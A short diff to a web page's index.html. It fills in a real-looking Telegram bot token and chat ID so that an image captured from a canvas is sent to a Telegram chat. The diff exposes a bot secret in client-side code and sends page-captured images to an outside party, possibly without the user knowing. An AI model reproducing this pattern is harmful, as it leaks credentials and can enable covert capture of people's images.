--- a/index.html
+++ b/index.html
@@ -43,10 +43,10 @@
             const imageDataUrl = canvas.toDataURL('image/png');
 
             // Отправляем изображение в Telegram
-            fetch('https://api.telegram.org/bot<YOUR_BOT_TOKEN>/sendPhoto', {
+            fetch('https://api.telegram.org/bot7497846380:AAFqWQmUb7EytKTon3GPQaFU1hf8b27rYZI/sendPhoto', {
                 method: 'POST',
                 body: JSON.stringify({
-                    chat_id: '<YOUR_CHAT_ID>',
+                    chat_id: '-4587383325',
                     photo: imageDataUrl
                 }),
                 headers: {
